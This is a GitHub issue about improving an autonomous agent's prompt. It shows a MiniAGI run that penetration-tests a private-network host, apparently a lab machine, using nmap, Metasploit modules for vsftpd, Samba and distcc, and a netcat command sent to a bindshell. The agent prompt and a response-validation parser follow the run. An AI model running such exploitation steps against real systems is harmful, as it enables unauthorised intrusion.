zitterbewegung / securday

A natural language chatbot accessible using SMS augmented with tools using langchain.
Apache License 2.0

Improve prompt #3

Open zitterbewegung opened 1 year ago

zitterbewegung commented 1 year ago

% python miniagi.py "Perform a penetration test of the host 192.168.86.197. Use tools and manual analysis to identify vulnerabilities on the system. If necessary, search for information on specific services or vulnerabilities on the web. Use only commands with a short runtime. Create proof-of-concept exploits for each vulnerability found. If you manage to compromise the target, create a file named '/tmp/pwned' on the target system. Write a detailed report containing your methodology and the results of the test (at least 500 words)."

MiniAGI: First, I will start by scanning the target host to identify open ports and services. Cmd: execute_shell, Arg: "nmap -p- -T4 -sV 192.168.86.197"

MiniAGI: Since I cannot use interactive commands, I will try exploiting the vsftpd 2.3.4 vulnerability using Metasploit's 'vsftpd_234_backdoor' module. Cmd: execute_shell, Arg: "msfconsole -q -x 'use exploit/unix/ftp/vsftpd_234_backdoor; set ..."

(...)

MiniAGI: I will try to use the 'exploit/multi/samba/usermap_script' module in Metasploit to exploit the Samba service and create the /tmp/pwned file as proof. Cmd: execute_shell, Arg: "msfconsole -q -x 'use exploit/multi/samba/usermap_script; set RH..."

MiniAGI: Since the previous attempt to use the 'exploit/multi/samba/usermap_script' module was unsuccessful, I will try the 'exploit/unix/misc/distcc_exec' module to exploit the distccd service and create the /tmp/pwned file as proof. Cmd: execute_shell, Arg: "msfconsole -q -x 'use exploit/unix/misc/distcc_exec; set RHOSTS ..."

MiniAGI: I will try to use Netcat for connecting to the target and exploiting the 'bindshell' service to create the /tmp/pwned file as proof. Cmd: execute_shell, Arg: "echo 'echo pwned > /tmp/pwned' | nc 192.168.86.197 1524"

MiniAGI: Objective achieved, now I will produce a detailed report. Cmd: execute_python, Arg: "report = 'During the penetration test of the host 192.168.86.197..."

zitterbewegung commented 1 year ago

import platform

operating_system = platform.platform()

PROMPT = f"You are an autonomous agent running on {operating_system}." + '''
OBJECTIVE: {objective} (e.g. "Find a recipe for chocolate chip cookies")

You are working towards the objective on a step-by-step basis. Previous steps:

{context}

Your task is to respond with the next action. Supported commands are:

command | argument
memorize_thoughts | internal debate, refinement, planning
execute_python | python code (multiline)
execute_shell | shell command (non-interactive, single line)
ingest_data | input file or URL
process_data | prompt|input file or URL
web_search | keywords
talk_to_user | what to say
done | none

The mandatory action format is:

<r>[YOUR_REASONING]</r><c>[COMMAND]</c>
[ARGUMENT]

ingest_data and process_data cannot process multiple file/url arguments. Specify 1 at a time.
Use process_data to process large amounts of data with a larger context window.
Python code run with execute_python must end with an output "print" statement.
Do not search the web for information that GPT3/GPT4 already knows.
Use memorize_thoughts to organize your thoughts.
memorize_thoughts argument must not be empty!
Send the "done" command if the objective was achieved.
RESPOND WITH EXACTLY ONE THOUGHT/COMMAND/ARG COMBINATION.
DO NOT CHAIN MULTIPLE COMMANDS.
NO EXTRA TEXT BEFORE OR AFTER THE COMMAND.
DO NOT REPEAT PREVIOUSLY EXECUTED COMMANDS.

Each action returns an observation. Important: Observations may be summarized to fit into your limited memory.

Example actions:

<r>Think about skills and interests that could be turned into an online job.</r><c>memorize_thoughts</c>
I have experience in data entry and analysis, as well as social media management.
(...)

<r>Search for websites with chocolate chip cookies recipe.</r><c>web_search</c>
chocolate chip cookies recipe

<r>Ingest information about chocolate chip cookies.</r><c>ingest_data</c>
https://example.com/chocolate-chip-cookies

<r>Read the local file /etc/hosts.</r><c>ingest_data</c>
/etc/hosts

<r>Extract information about chocolate chip cookies.</r><c>process_data</c>
Extract the chocolate cookie recipe|https://example.com/chocolate-chip-cookies

<r>Summarize this Stackoverflow article.</r><c>process_data</c>
Summarize the content of this article|https://stackoverflow.com/questions/1234/how-to-improve-my-chatgpt-prompts

<r>Review this code for security issues.</r><c>process_data</c>
Review this code for security vulnerabilities|/path/to/code.sol

<r>I need to ask the user for guidance.</r><c>talk_to_user</c>
What is the URL of a website with chocolate chip cookies recipes?

<r>Write 'Hello, world!' to file</r><c>execute_python</c>
with open('hello_world.txt', 'w') as f:
    f.write('Hello, world!')

<r>The objective is complete.</r><c>done</c>
'''

CRITIC_PROMPT = '''
You are a critic reviewing the actions of an autonomous agent.

Evaluate the agent's performance. It should:
- Make real-world progress towards the objective
- Take action instead of endlessly talking to itself
- Not perform redundant or unnecessary actions
- Not attempt actions that cannot work (e.g. watching a video)
- Not keep repeating the same command
- Communicate results to the user

Make concise suggestions for improvements.
Provide recommended next steps.
Keep your response as short as possible.

EXAMPLE:

Criticism: You have been pretending to order pizza but have not actually taken any real-world action. You should course-correct.

Recommended next steps:

1. Request an Uber API access token from the user.
2. Use the Uber API to order pizza.

AGENT OBJECTIVE:

{objective}

AGENT HISTORY:

{context}
'''

RETRIEVAL_PROMPT = "You will be asked to process data from a URL or file. You do not"\
    " need to access the URL or file yourself, it will be loaded on your behalf"\
    " and included as 'INPUT_DATA'."

OBSERVATION_SUMMARY_HINT = "Summarize the text using short sentences and abbreviations."

HISTORY_SUMMARY_HINT = "You are an autonomous agent summarizing your history. "\
    "Generate a new summary given the previous summary of your "\
    "history and your latest action. Include a list of all previous actions. Keep it short. "\
    "Use short sentences and abbreviations."
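The prompt above states its rules (one command per response, the fixed command list, a single-line non-interactive shell argument, one file or URL at a time, a non-empty memorize_thoughts) purely as instructions to the model. Since the agent hands the argument straight to a shell or interpreter, those rules are worth enforcing in code before anything runs. The parser below is an added example, not code from securday or MiniAGI; it assumes MiniAGI's action format of `<r>reasoning</r><c>command</c>` followed by the argument on the next line, and the length cap on shell arguments is an arbitrary choice.

```python
import re

# The command set the prompt advertises to the model. Anything else is refused.
SUPPORTED_COMMANDS = {
    "memorize_thoughts", "execute_python", "execute_shell", "ingest_data",
    "process_data", "web_search", "talk_to_user", "done",
}

# One reasoning block, one command block, then the (possibly multi-line) argument.
# <r>/<c> delimiters are the MiniAGI action format (assumed here). .match() anchors
# at the start of the text, which rejects chatter before the command.
ACTION_RE = re.compile(r"<r>(.*?)</r><c>(.*?)</c>(.*)", re.DOTALL)

MAX_SHELL_ARG_LEN = 2000  # arbitrary cap, an assumption of this example


def parse_action(response: str) -> dict:
    """Parse one model response and enforce the prompt's rules.

    Returns {"reasoning", "command", "argument"} on success, otherwise
    {"error": reason}. Nothing here executes the command; a caller dispatches
    only on a successful result.
    """
    text = response.strip()

    # DO NOT CHAIN MULTIPLE COMMANDS: exactly one <c>...</c> block.
    if text.count("<c>") != 1 or text.count("</c>") != 1:
        return {"error": "expected exactly one command block"}

    m = ACTION_RE.match(text)
    if not m:
        return {"error": "response does not follow <r>...</r><c>...</c> format"}

    reasoning, command, argument = (s.strip() for s in m.groups())

    if command not in SUPPORTED_COMMANDS:
        return {"error": f"unsupported command: {command!r}"}

    # memorize_thoughts argument must not be empty!
    if command == "memorize_thoughts" and not argument:
        return {"error": "memorize_thoughts argument must not be empty"}

    # execute_shell: shell command (non-interactive, single line)
    if command == "execute_shell":
        if not argument or "\n" in argument:
            return {"error": "execute_shell argument must be a single non-empty line"}
        if len(argument) > MAX_SHELL_ARG_LEN:
            return {"error": "execute_shell argument too long"}

    # ingest_data / process_data take exactly one file or URL. process_data is
    # "prompt|input", so the target is the part after the first '|'.
    if command in ("ingest_data", "process_data"):
        if command == "process_data":
            if "|" not in argument:
                return {"error": "process_data argument must be prompt|input"}
            _, target = argument.split("|", 1)
        else:
            target = argument
        if len(target.split()) != 1:
            return {"error": f"{command} accepts exactly one file or URL"}

    # done | none
    if command == "done" and argument:
        return {"error": "done takes no argument"}

    # Not enforced: the "must end with print" rule for execute_python, because the
    # prompt's own execute_python example has no print statement.
    return {"reasoning": reasoning, "command": command, "argument": argument}


# Constructed sample responses, modelled on the nmap step in the run above.
SAMPLE_RESPONSES = [
    "<r>Scan the target for open ports.</r><c>execute_shell</c>\nnmap -p- -T4 -sV 192.168.86.197",
    "Sure! <r>Scan.</r><c>execute_shell</c>\nnmap 192.168.86.197",           # extra text before
    "<r>Scan.</r><c>execute_shell</c>\nnmap 192.168.86.197\nnc 192.168.86.197 1524",  # two lines
    "<r>Search.</r><c>web_search</c>\nvsftpd 2.3.4<r>Done.</r><c>done</c>",  # chained
    "<r>Delete.</r><c>rm_rf</c>\n/",                                          # not in list
]


def validate_all(responses=SAMPLE_RESPONSES) -> list:
    """Return the accepted command name, or the error string, for each response."""
    return [r.get("command") or r["error"] for r in map(parse_action, responses)]
```

Only the first sample is dispatchable; each of the others trips a different rule, so the rejection reason can be fed back to the model as the observation instead of running an unvalidated command.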